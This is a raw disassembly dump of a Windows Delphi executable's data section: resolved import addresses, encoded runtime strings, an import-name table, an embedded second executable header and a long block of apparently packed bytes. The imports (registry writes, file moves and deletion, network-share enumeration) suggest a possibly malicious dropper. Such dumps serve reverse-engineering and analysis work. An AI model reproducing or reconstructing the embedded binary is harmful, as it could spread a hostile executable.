dword_40D000 dd 3Ch dup(0) dword_40D0F0 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_40D0F4 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSectiondword_40D0F8 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSectiondword_40D0FC dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_40D100 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_40D104 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_40D108 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_40D10C dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_40D110 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_40D114 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuerydword_40D118 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiBytedword_40D11C dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChardword_40D120 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_40D124 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_40D128 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyAdword_40D12C dd 7C801D4Fh ; resolved to->KERNEL32.LoadLibraryExAdword_40D130 dd 7C80A415h ; resolved to->KERNEL32.GetThreadLocaledword_40D134 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_40D138 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_40D13C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_40D140 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_40D144 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_40D148 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_40D14C dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_40D150 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_40D154 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileAdword_40D158 dd 7C80EDD7h ; resolved to->KERNEL32.FindClosedword_40D15C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_40D160 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_40D164 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_40D168 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_40D16C dd 7C832044h ; resolved to->KERNEL32.SetEndOfFiledword_40D170 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_40D174 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_40D178 dd 7C812A09h ; resolved to->KERNEL32.RaiseException dd 7C812F39h, 7C810A77h, 7C810E51h, 7C801A24h, 7C809B47h
dd 0
dword_40D194 dd 7E43119Bh ; resolved to->USER32.GetKeyboardTypedword_40D198 dd 7E42DFA8h ; resolved to->USER32.LoadStringAdword_40D19C dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_40D1A0 dd 7E42DF50h ; resolved to->USER32.CharNextA align 8
dword_40D1A8 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_40D1AC dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_40D1B0 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey align 8
dword_40D1B8 dd 77126AEAh dword_40D1BC dd 77124E1Eh dword_40D1C0 dd 77124920h dword_40D1C4 dd 77124C7Eh dword_40D1C8 dd 77124880h dword_40D1CC dd 771544ADh dword_40D1D0 dd 77124BA7h align 8
dword_40D1D8 dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValuedword_40D1DC dd 7C809740h ; resolved to->KERNEL32.TlsGetValuedword_40D1E0 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_40D1E4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_40D1E8 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA align 10h
dword_40D1F0 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_40D1F4 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_40D1F8 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_40D1FC dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey dd 0
dword_40D204 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuerydword_40D208 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_40D20C dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesAdword_40D210 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChardword_40D214 dd 7C835E8Fh ; resolved to->KERNEL32.MoveFileAdword_40D218 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_40D21C dd 7C80A415h ; resolved to->KERNEL32.GetThreadLocaledword_40D220 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_40D224 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_40D228 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_40D22C dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_40D230 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTimedword_40D234 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_40D238 dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeAdword_40D23C dd 7C8302EDh ; resolved to->KERNEL32.GetDiskFreeSpaceAdword_40D240 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfodword_40D244 dd 7C82F7A0h ; resolved to->KERNEL32.FormatMessageAdword_40D248 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileAdword_40D24C dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileAdword_40D250 dd 7C80EDD7h ; resolved to->KERNEL32.FindClosedword_40D254 dd 7C80E866h ; resolved to->KERNEL32.FileTimeToLocalFileTimedword_40D258 dd 7C83065Dh ; resolved to->KERNEL32.FileTimeToDosDateTimedword_40D25C dd 7C838211h ; resolved to->KERNEL32.EnumCalendarInfoAdword_40D260 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileAdword_40D264 dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_40D268 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle align 10h
dword_40D270 dd 71B2B2C0h dword_40D274 dd 71B2AC75h dword_40D278 dd 71B230D7h align 10h
dword_40D280 dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_40D284 dd 7E42DFA8h ; resolved to->USER32.LoadStringAdword_40D288 dd 7E418F9Ch ; resolved to->USER32.GetSystemMetrics align 10h
dword_40D290 dd 774FEE36h dd 77502A37h, 0
dword_40D29C dd 7712A63Fh dword_40D2A0 dd 77124880h dword_40D2A4 dd 757h dup(0)
dd offset dword_40D2A4+0D5Ch
dd offset dword_40D2A4+0D64h
dd offset TlsIndex
dd offset dword_40F010
dword_40F010 dd 86Ch dup(0) dd 440006h, 430056h, 41004Ch, 0B004Ch, 410050h, 4B0043h
dd 470041h, 490045h, 46004Eh, 4Fh, 530008h, 740061h, 720075h
dd 610064h, 0E0079h, 4C004Fh, 200045h, 720065h, 6F0072h
dd 200072h, 2E0025h, 780038h, 4D002Eh, 740065h, 6F0068h
dd 200064h, 250027h, 270073h, 6E0020h, 74006Fh, 730020h
dd 700075h, 6F0070h, 740072h, 640065h, 620020h, 200079h
dd 750061h, 6F0074h, 61006Dh, 690074h, 6E006Fh, 6F0020h
dd 6A0062h, 630065h, 2F0074h, 610056h, 690072h, 6E0061h
dd 200074h, 6F0064h, 730065h, 6E0020h, 74006Fh, 720020h
dd 660065h, 720065h, 6E0065h, 650063h, 610020h, 20006Eh
dd 750061h, 6F0074h, 61006Dh, 690074h, 6E006Fh, 6F0020h
dd 6A0062h, 630065h, 74h, 8 dup(0)
aOctoberNovembe:
dw 7
unicode 0, <October>
dw 8
unicode 0, <November>
dw 8
unicode 0, <December>
dd 530003h, 6E0075h, 4D0003h, 6E006Fh, 540003h, 650075h
dd 570003h, 640065h, 540003h, 750068h, 460003h, 690072h
dd 530003h, 740061h, 530006h, 6E0075h, 610064h, 60079h
dd 6F004Dh, 64006Eh, 790061h, 540007h, 650075h, 640073h
dd 790061h, 570009h, 640065h, 65006Eh, 640073h, 790061h
dd 540008h, 750068h, 730072h, 610064h, 60079h, 720046h
dd 640069h, 790061h, 8 dup(0)
dd 4A0003h, 6E0075h, 4A0003h, 6C0075h, 410003h, 670075h
dd 530003h, 700065h, 4F0003h, 740063h, 4E0003h, 76006Fh
dd 440003h, 630065h, 4A0007h, 6E0061h, 610075h, 790072h
dd 460008h, 620065h, 750072h, 720061h, 50079h, 61004Dh
dd 630072h, 50068h, 700041h, 690072h, 3006Ch, 61004Dh
dd 40079h, 75004Ah, 65006Eh, 4A0004h, 6C0075h, 60079h
dd 750041h, 750067h, 740073h, 530009h, 700065h, 650074h
dd 62006Dh, 720065h, 8 dup(0)
dd 570005h, 690072h, 650074h, 45001Ch, 720072h, 72006Fh
dd 630020h, 650072h, 740061h, 6E0069h, 200067h, 610076h
dd 690072h, 6E0061h, 200074h, 720061h, 610072h, 170079h
dd 610056h, 690072h, 6E0061h, 200074h, 730069h, 6E0020h
dd 74006Fh, 610020h, 20006Eh, 720061h, 610072h, 210079h
dd 610056h, 690072h, 6E0061h, 200074h, 720061h, 610072h
dd 200079h, 6E0069h, 650064h, 200078h, 75006Fh, 200074h
dd 66006Fh, 620020h, 75006Fh, 64006Eh, 150073h, 780045h
dd 650074h, 6E0072h, 6C0061h, 650020h, 630078h, 700065h
dd 690074h, 6E006Fh, 250020h, 100078h, 730041h, 650073h
dd 740072h, 6F0069h, 20006Eh, 610066h, 6C0069h, 640065h
dd 490017h, 74006Eh, 720065h, 610066h, 650063h, 6E0020h
dd 74006Fh, 730020h, 700075h, 6F0070h, 740072h, 640065h
dd 45001Ch, 630078h, 700065h, 690074h, 6E006Fh, 690020h
dd 20006Eh, 610073h, 650066h, 610063h, 6C006Ch, 6D0020h
dd 740065h, 6F0068h, 100064h, 730025h, 280020h, 730025h
dd 20002Ch, 69006Ch, 65006Eh, 250020h, 290064h, 41000Eh
dd 730062h, 720074h, 630061h, 200074h, 720045h, 6F0072h
dd 3F0072h, 630041h, 650063h, 730073h, 760020h, 6F0069h
dd 61006Ch, 690074h, 6E006Fh, 610020h, 200074h, 640061h
dd 720064h, 730065h, 200073h, 700025h, 690020h, 20006Eh
dd 6F006Dh, 750064h, 65006Ch, 270020h, 730025h, 2E0027h
dd 250020h, 200073h, 66006Fh, 610020h, 640064h, 650072h
dd 730073h, 250020h, 30070h, 61004Ah, 3006Eh, 650046h
dd 30062h, 61004Dh, 30072h, 700041h, 30072h, 61004Dh, 79h
dd 8 dup(0)
dd 460017h, 6F006Ch, 740061h, 6E0069h, 200067h, 6F0070h
dd 6E0069h, 200074h, 76006Fh, 720065h, 6C0066h, 77006Fh
dd 460018h, 6F006Ch, 740061h, 6E0069h, 200067h, 6F0070h
dd 6E0069h, 200074h, 6E0075h, 650064h, 660072h, 6F006Ch
dd 190077h, 6E0049h, 610076h, 69006Ch, 200064h, 6F0070h
dd 6E0069h, 650074h, 200072h, 70006Fh, 720065h, 740061h
dd 6F0069h, 16006Eh, 6E0049h, 610076h, 69006Ch, 200064h
dd 6C0063h, 730061h, 200073h, 790074h, 650070h, 610063h
dd 740073h, 410030h, 630063h, 730065h, 200073h, 690076h
dd 6C006Fh, 740061h, 6F0069h, 20006Eh, 740061h, 610020h
dd 640064h, 650072h, 730073h, 250020h, 2E0070h, 250020h
dd 200073h, 66006Fh, 610020h, 640064h, 650072h, 730073h
dd 250020h, 0E0070h, 740053h, 630061h, 20006Bh, 76006Fh
dd 720065h, 6C0066h, 77006Fh, 43000Dh, 6E006Fh, 720074h
dd 6C006Fh, 43002Dh, 680020h, 740069h, 500016h, 690072h
dd 690076h, 65006Ch, 650067h, 200064h, 6E0069h, 740073h
dd 750072h, 740063h, 6F0069h, 25006Eh, 780045h, 650063h
dd 740070h, 6F0069h, 20006Eh, 730025h, 690020h, 20006Eh
dd 6F006Dh, 750064h, 65006Ch, 250020h, 200073h, 740061h
dd 250020h, 2E0070h, 25000Ah, 250073h, 110073h, 700041h
dd 6C0070h, 630069h, 740061h, 6F0069h, 20006Eh, 720045h
dd 6F0072h, 310072h, 6F0046h, 6D0072h, 740061h, 270020h
dd 730025h, 200027h, 6E0069h, 610076h, 69006Ch, 200064h
dd 72006Fh, 690020h, 63006Eh, 6D006Fh, 610070h, 690074h
dd 6C0062h, 200065h, 690077h, 680074h, 610020h, 670072h
dd 6D0075h, 6E0065h, 1B0074h, 6F004Eh, 610020h, 670072h
dd 6D0075h, 6E0065h, 200074h, 6F0066h, 200072h, 6F0066h
dd 6D0072h, 740061h, 270020h, 730025h, 1F0027h, 6E0049h
dd 610076h, 69006Ch, 200064h, 610076h, 690072h, 6E0061h
dd 200074h, 790074h, 650070h, 630020h, 6E006Fh, 650076h
dd 730072h, 6F0069h, 19006Eh, 6E0049h, 610076h, 69006Ch
dd 200064h, 610076h, 690072h, 6E0061h, 200074h, 70006Fh
dd 720065h, 740061h, 6F0069h, 22006Eh, 610056h, 690072h
dd 6E0061h, 200074h, 65006Dh, 680074h, 64006Fh, 630020h
dd 6C0061h, 73006Ch, 6E0020h, 74006Fh, 730020h, 700075h
dd 6F0070h, 740072h, 640065h, 520004h, 610065h, 64h, 8 dup(0)
dd 49001Fh, 76006Eh, 6C0061h, 640069h, 610020h, 670072h
dd 6D0075h, 6E0065h, 200074h, 6F0074h, 740020h, 6D0069h
dd 200065h, 6E0065h, 6F0063h, 650064h, 49001Fh, 76006Eh
dd 6C0061h, 640069h, 610020h, 670072h, 6D0075h, 6E0065h
dd 200074h, 6F0074h, 640020h, 740061h, 200065h, 6E0065h
dd 6F0063h, 650064h, 4F000Dh, 740075h, 6F0020h, 200066h
dd 65006Dh, 6F006Dh, 790072h, 49000Ch, 4F002Fh, 650020h
dd 720072h, 72006Fh, 250020h, 0E0064h, 690046h, 65006Ch
dd 6E0020h, 74006Fh, 660020h, 75006Fh, 64006Eh, 490010h
dd 76006Eh, 6C0061h, 640069h, 660020h, 6C0069h, 6E0065h
dd 6D0061h, 130065h, 6F0054h, 20006Fh, 61006Dh, 79006Eh
dd 6F0020h, 650070h, 20006Eh, 690066h, 65006Ch, 120073h
dd 690046h, 65006Ch, 610020h, 630063h, 730065h, 200073h
dd 650064h, 69006Eh, 640065h, 520017h, 610065h, 200064h
dd 650062h, 6F0079h, 64006Eh, 650020h, 64006Eh, 6F0020h
dd 200066h, 690066h, 65006Ch, 440009h, 730069h, 20006Bh
dd 750066h, 6C006Ch, 490015h, 76006Eh, 6C0061h, 640069h
dd 6E0020h, 6D0075h, 720065h, 630069h, 690020h, 70006Eh
dd 740075h, 440010h, 760069h, 730069h, 6F0069h, 20006Eh
dd 790062h, 7A0020h, 720065h, 11006Fh, 610052h, 67006Eh
dd 200065h, 680063h, 630065h, 20006Bh, 720065h, 6F0072h
dd 100072h, 6E0049h, 650074h, 650067h, 200072h, 76006Fh
dd 720065h, 6C0066h, 77006Fh, 490020h, 76006Eh, 6C0061h
dd 640069h, 660020h, 6F006Ch, 740061h, 6E0069h, 200067h
dd 6F0070h, 6E0069h, 200074h, 70006Fh, 720065h, 740061h
dd 6F0069h, 1F006Eh, 6C0046h, 61006Fh, 690074h, 67006Eh
dd 700020h, 69006Fh, 74006Eh, 640020h, 760069h, 730069h
dd 6F0069h, 20006Eh, 790062h, 7A0020h, 720065h, 6Fh, 8 dup(0)
dd 235D7823h, 19F3A5B6h, 240F343h, 0C711D126h, 0CC000001h
dd 0
dd 10h, 63737401h, 1C006E61h, 6D6F4314h, 7274636Dh, 0C700006Ch
dd 74737953h, 6D65h, 73795381h, 74696E49h, 4D331C00h, 61737365h
dd 736567h, 69574B0Ch, 776F646Eh, 73000073h, 69746341h
dd 586576h, 68532A1Ch, 416C6C65h, 1C004950h, 676552BBh
dd 727453h, 69573F1Ch, 656E496Eh, 0EF1C0074h, 4D6C7255h
dd 10006E6Fh, 6D6F4371h, 736E6F43h, 9D100074h, 43737953h
dd 74736E6Fh, 53280C00h, 624F6C68h, 4600006Ah, 4F6D6F43h
dd 6A62h, 73795302h, 6C697455h, 73h, 75h dup(0)
dd 0C8h, 0C204h, 72695601h, 6C617574h, 72657551h, 53010079h
dd 7065656Ch, 65530100h, 6C694674h, 74744165h, 75626972h
dd 41736574h, 754D0100h, 4269746Ch, 54657479h, 6469576Fh
dd 61684365h, 4D010072h, 4665766Fh, 41656C69h, 65470100h
dd 72655674h, 6E6F6973h, 417845h, 74654701h, 65726854h
dd 6F4C6461h, 656C6163h, 65470100h, 6F725074h, 64644163h
dd 73736572h, 65470100h, 646F4D74h, 48656C75h, 6C646E61h
dd 1004165h, 4D746547h, 6C75646Fh, 6C694665h, 6D614E65h
dd 1004165h, 4C746547h, 6C61636Fh, 666E4965h, 100416Fh
dd 4C746547h, 6C61636Fh, 656D6954h, 65470100h, 73614C74h
dd 72724574h, 100726Fh, 44746547h, 65766972h, 65707954h
dd 47010041h, 69447465h, 72466B73h, 70536565h, 41656361h
dd 65470100h, 49504374h, 6F666Eh, 726F4601h, 4D74616Dh
dd 61737365h, 416567h, 6E694601h, 78654E64h, 6C694674h
dd 1004165h, 646E6946h, 73726946h, 6C694674h, 1004165h
dd 646E6946h, 736F6C43h, 46010065h, 54656C69h, 54656D69h
dd 636F4C6Fh, 69466C61h, 6954656Ch, 100656Dh, 656C6946h
dd 656D6954h, 6F446F54h, 74614473h, 6D695465h, 45010065h
dd 436D756Eh, 6E656C61h, 49726164h, 416F666Eh, 65440100h
dd 6574656Ch, 656C6946h, 43010041h, 74616572h, 6C694665h
dd 1004165h, 736F6C43h, 6E614865h, 656C64h, 0C800h, 0C1D800h
dd 6C540100h, 74655373h, 756C6156h, 54010065h, 6547736Ch
dd 6C615674h, 1006575h, 61636F4Ch, 6C6C416Ch, 100636Fh
dd 4D746547h, 6C75646Fh, 6E614865h, 41656C64h, 65470100h
dd 646F4D74h, 46656C75h, 4E656C69h, 41656D61h, 0C80000h
dd 0C0F00000h, 47010000h, 75437465h, 6E657272h, 72685474h
dd 49646165h, 44010064h, 74656C65h, 69724365h, 61636974h
dd 6365536Ch, 6E6F6974h, 654C0100h, 43657661h, 69746972h
dd 536C6163h, 69746365h, 1006E6Fh, 65746E45h, 69724372h
dd 61636974h, 6365536Ch, 6E6F6974h, 6E490100h, 61697469h
dd 657A696Ch, 74697243h, 6C616369h, 74636553h, 6E6F69h
dd 72695601h, 6C617574h, 65657246h, 69560100h, 61757472h
dd 6C6C416Ch, 100636Fh, 61636F4Ch, 6572466Ch, 4C010065h
dd 6C61636Fh, 6F6C6C41h, 56010063h, 75747269h, 75516C61h
dd 797265h, 64695701h, 61684365h, 4D6F5472h, 69746C75h
dd 65747942h, 754D0100h, 4269746Ch, 54657479h, 6469576Fh
dd 61684365h, 6C010072h, 6C727473h, 416E65h, 74736C01h
dd 79706372h, 100416Eh, 7274736Ch, 41797063h, 6F4C0100h
dd 694C6461h, 72617262h, 41784579h, 65470100h, 72685474h
dd 4C646165h, 6C61636Fh, 47010065h, 74537465h, 75747261h
dd 666E4970h, 100416Fh, 50746547h, 41636F72h, 65726464h
dd 1007373h, 4D746547h, 6C75646Fh, 6E614865h, 41656C64h
dd 65470100h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 65470100h, 636F4C74h, 49656C61h, 416F666Eh, 65470100h
dd 73614C74h, 72724574h, 100726Fh, 43746547h, 616D6D6Fh
dd 694C646Eh, 41656Eh, 65724601h, 62694C65h, 79726172h
dd 69460100h, 6946646Eh, 46747372h, 41656C69h, 69460100h
dd 6C43646Eh, 65736Fh, 69784501h, 6F725074h, 73736563h
dd 72570100h, 46657469h, 656C69h, 686E5501h, 6C646E61h
dd 78456465h, 74706563h, 466E6F69h, 65746C69h, 53010072h
dd 69467465h, 6F50656Ch, 65746E69h, 53010072h, 6E457465h
dd 46664F64h, 656C69h, 6C745201h, 69776E55h, 100646Eh
dd 64616552h, 656C6946h, 61520100h, 45657369h, 70656378h
dd 6E6F6974h, 65470100h, 64745374h, 646E6148h, 100656Ch
dd 46746547h, 53656C69h, 657A69h, 74654701h, 656C6946h
dd 65707954h, 72430100h, 65746165h, 656C6946h, 43010041h
dd 65736F6Ch, 646E6148h, 656Ch, 0D5h, 0C1F0h, 67655201h
dd 56746553h, 65756C61h, 417845h, 67655201h, 72657551h
dd 6C615679h, 78456575h, 52010041h, 704F6765h, 654B6E65h
dd 41784579h, 65520100h, 6F6C4367h, 654B6573h, 0D5000079h
dd 0A8000000h, 10000C1h, 51676552h, 79726575h, 756C6156h
dd 41784565h, 65520100h, 65704F67h, 79654B6Eh, 417845h
dd 67655201h, 736F6C43h, 79654B65h, 0E20000h, 0C2700000h
dd 57010000h, 4F74654Eh, 456E6570h, 416D756Eh, 4E570100h
dd 6E457465h, 65526D75h, 72756F73h, 416563h, 654E5701h
dd 6F6C4374h, 6E456573h, 6D75h, 0EAh, 0C290h, 556F4301h
dd 696E696Eh, 6C616974h, 657A69h, 496F4301h, 6974696Eh
dd 7A696C61h, 0F4000065h, 9C000000h, 10000C2h, 45746547h
dd 726F7272h, 6F666E49h, 79530100h, 65724673h, 72745365h
dd 676E69h, 0F400h, 0C1B800h, 61560100h, 6E616972h, 61684374h
dd 5465676Eh, 45657079h, 56010078h, 61697261h, 6F43746Eh
dd 6E497970h, 56010064h, 61697261h, 6C43746Eh, 726165h
dd 73795301h, 69727453h, 654C676Eh, 5301006Eh, 72467379h
dd 74536565h, 676E6972h, 79530100h, 41655273h, 636F6C6Ch
dd 69727453h, 654C676Eh, 5301006Eh, 6C417379h, 53636F6Ch
dd 6E697274h, 6E654C67h, 1010000h, 0C1940000h, 47010000h
dd 654B7465h, 616F6279h, 79546472h, 1006570h, 64616F4Ch
dd 69727453h, 41676Eh, 73654D01h, 65676173h, 41786F42h
dd 68430100h, 654E7261h, 417478h, 10100h, 0C28000h, 654D0100h
dd 67617373h, 786F4265h, 4C010041h, 5364616Fh, 6E697274h
dd 1004167h, 53746547h, 65747379h, 74654D6Dh, 73636972h
dd 0
dd 45500000h, 14C0000h, 5E190008h, 2A42h, 0
dd 0E00000h, 10B818Fh, 0A0001902h, 30000000h, 0
dd 0AF300000h, 10000000h, 0B0000000h, 0
dd 10000040h, 2000000h, 10000h, 0
dd 40000h, 0
dd 20000000h, 4000001h, 0
dd 20000h, 0
dd 40000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 0D0000000h, 9CE0000h, 10000000h, 10000001h, 5 dup(0)
dd 0D640001h, 6 dup(0)
dd 0F0000000h, 180000h, 0Ch dup(0)
dd 4F430000h, 4544h, 9FE00000h, 10000000h, 0A0000000h
dd 4000000h, 3 dup(0)
dd 200000h, 41446000h, 4154h, 48C0000h, 0B0000000h, 6000000h
dd 0A4000000h, 3 dup(0)
dd 400000h, 5342C000h, 53h, 6450000h, 0C0000000h, 0
dd 0AA000000h, 4 dup(0)
dd 692EC000h, 61746164h, 9CE0000h, 0D0000000h, 0A000000h
dd 0AA000000h, 3 dup(0)
dd 400000h, 742EC000h, 736Ch, 80000h, 0E0000000h, 0
dd 0B4000000h, 4 dup(0)
dd 722EC000h, 61746164h, 180000h, 0F0000000h, 2000000h
dd 0B4000000h, 3 dup(0)
dd 400000h, 722E5000h, 636F6C65h, 0D640000h, 0
dd 0E000001h, 0B6000000h, 3 dup(0)
dd 400000h, 722E5000h, 637273h, 2 dup(10000000h), 10000001h
dd 0C4000000h, 3 dup(0)
dd 400000h, 10005000h, 0D2A80001h, 0
dd 11672h, 3931010Fh, 0D85CC479h, 0EC28E614h, 9EFF00A7h
dd 573C33B0h, 0B0036F97h, 58A8B397h, 172C984Eh, 7857E87Bh
dd 9E1C04Bh, 1CBF13BBh, 5758D807h, 0B673C004h, 30310C1Fh
dd 40B014E7h, 0B27796D7h, 8B0761E1h, 271059F0h, 5D5EEC67h
dd 93D00349h, 757C81Bh, 0F841C208h, 370B70h, 0E7C21CEFh
dd 0BB19B5Dh, 13C00813h, 0AEC05310h, 0FB09DD3Bh, 53682F60h
dd 677443D8h, 73208C1Ch, 0E84758C0h, 19CF984Bh, 0B807EEBBh
dd 53C0341Fh, 0DD358A8h, 589719C6h, 383FF837h, 8F74D35Eh
dd 40F80797h, 7BAEB3D0h, 0F037EBDDh, 0BF280343h, 0EC2FC0D7h
dd 0F0BB19DEh, 9358E003h, 48EBEFD8h, 7438ECC0h, 17D08B67h
dd 4AEF0F14h, 331F75C0h, 0E758F89Eh, 202B1C7Fh, 0EECCF0EFh
dd 57E0AF7Fh, 0ED3278Fh, 2B4EF74Dh, 5078070Bh, 4D95055Fh
dd 3B5867FAh, 64220200h, 15451140h, 51DA0396h, 40E0F981h
dd 10810800h, 2A202BF0h, 410F83A9h, 6036041h, 73664400h
dd 5600FF37h, 4C004300h, 0B4100h, 4B0D0750h, 8AAB7F88h
dd 493B47h, 46004Eh, 516A224Fh, 0BB298BD0h, 79DFEEEEh
dd 750074h, 9640072h, 170E0079h, 20234Ch, 0B9B77FCDh, 6F011365h
dd 25002005h, 38002E00h, 5C4D7800h, 177734D7h, 64680074h
dd 5731927h, 0DBA6BAE7h, 74116E09h, 1704B73h, 0FB9B3537h
dd 252B74DCh, 61195762h, 375D7574h, 716D17D6h, 156E0969h
dd 336A1D6Fh, 27D7734Dh, 2F1B63h, 4D617256h, 0EEB99775h
dd 53651F64h, 660F725Fh, 8DD73EC0h, 6313659Bh, 5F6E5905h
dd 2595773Dh, 29FD0700h, 0EF0B74D6h, 4E1F6335h, 116D760Bh
dd 4D8B2E19h, 3114D44h, 5EE9A643h, 76E79B7h, 540F734Dh
dd 7F358B65h, 0FFF57B1h, 46750068h, 84EF2FDBh, 6A1DF60h
dd 3D067737h, 64D8360Dh, 7343070Dh, 360D090Fh, 6E4B8360h
dd 72570813h, 9366CD95h, 0D610611h, 905F34EBh, 74AB72Dh
dd 0E09C416Ch, 9F67D7BAh, 0B077065h, 0D8374D03h, 0F9030320h
dd 75613707h, 8BEEB98h, 174687ABh, 0AC110B62h, 5773EEBh
dd 9F6309CBh, 95705505h, 5F6360D8h, 4994D61h, 0B9096579h
dd 6C362CEEh, 0CD757DBBh, 0B2A5EF74h, 74839C25h, 8E19CF67h
dd 5769B62Fh, 0C11C3367h, 88CF9ABDh, 152D6371h, 7667006Eh
dd 3217D8C6h, 9B720D67h, 4BD88317h, 7F695318h, 21782F15h
dd 4B211CECh, 0C748BE3Bh, 787BD176h, 66076F9Fh, 9DEF75D7h
dd 5D1D0F13h, 0B778AD15h, 0BA699E3Eh, 336C6E39h, 0A19B7065h
dd 25CB301Bh, 31271013h, 2DD0E373h, 51192B7Bh, 0F4236161h
dd 0C1DD7BDEh, 17218949h, 21D95B45h, 6B2B9F91h, 74CF7DB9h
dd 43612DDFh, 6D979565h, 2034EEB1h, 13FD10FFh, 0F7570728h
dd 92CBAC5h, 256F376Ch, 0E14D291Fh, 415C1EC5h, 8972D1E9h
dd 17879981h, 1D3F2EEBh, 95D17963h, 7D212F7Dh, 0BBF6C7Dh
dd 6C9B6405h, 7201D64Bh, 0A3705D29h, 97638B6Dh, 0FD751B15h
dd 73252E91h, 9B0853Ch, 6101416Fh, 0E3319A71h, 24D19FC1h
dd 0B398C964h, 0B18400AFh, 411701B9h, 10636F7Fh, 6387784Eh
dd 8F76F30Bh, 5FD94233h, 18007725h, 88F0192Fh, 19316070h
dd 0F7C8B7D5h, 6463F612h, 7063272Fh, 84BB2984h, 6333163Dh
dd 773C385Dh, 0D9740142h, 2420DB31h, 30A1784Ah, 18C26F8Dh
dd 0D50E074Dh, 136B0774h, 0C1CF1Eh, 2B65A10Dh, 0FB9B4EEAh
dd 250F2D77h, 50C9D168h, 45E1E0C1h, 67E79363h, 0CE661C59h
dd 755DFF78h, 0C60525A7h, 9DD1604Bh, 66CE4533h, 0CBDB19B3h
dd 8C23080Ah, 0B1103F1h, 0B634170h, 48CB8678h, 7CD31C7h
dd 33120709h, 7F691579h, 0BD9C18Dh, 0A9631525h, 60D8D670h
dd 89625183h, 4568ED77h, 81D3C0Dh, 856E6F0Dh, 0CAD3B31Bh
dd 55FB1722h, 0B0263295h, 31F8366h, 918C31EFh, 0D91D07FBh
dd 9D83654h, 19E77395h, 0AE04A53Fh, 1322778Ch, 60759359h
dd 734D2035h, 0DB87B97h, 7521B12h, 584A0047h, 27E52AD9h
dd 0E1DEF0D2h, 13A33F74h, 40DE6585h, 3F6769D8h, 0C084E764h
dd 0BB3FCA46h, 9EEBDD4Fh, 6335BC78h, 2F5B0C0Dh, 91D3461Fh
dd 0F645190h, 8326CF46h, 6607084Bh, 107B1017h, 6693CA6Ch
dd 8761232Dh, 13E2E6C8h, 8D6F6F01h, 926CB0D6h, 592D6E79h
dd 4BEE6712h, 0E3610348h, 681B6EBBh, 6F0F24B6h, 79621717h
dd 0B059BDECh, 0DB07E98Fh, 0B84F6357h, 1B0F09B8h, 2075136Bh
dd 0D108D94Ch, 436EB315h, 8F8C1846h, 70FB630Dh, 2518102Bh
dd 0D13FF4E3h, 918C296Bh, 2F7A77BBh, 520011D7h, 10989D67h
dd 0AD681AC6h, 310496Bh, 0ED325F58h, 20577225h, 9581284h
dd 250DAB47h, 1FCF6470h, 0ABFF64ADh, 0C7942Ch, 235D7823h
dd 19F3A5B6h, 0FFB676A2h, 240F343h, 0C711D126h, 0DDCC1701h
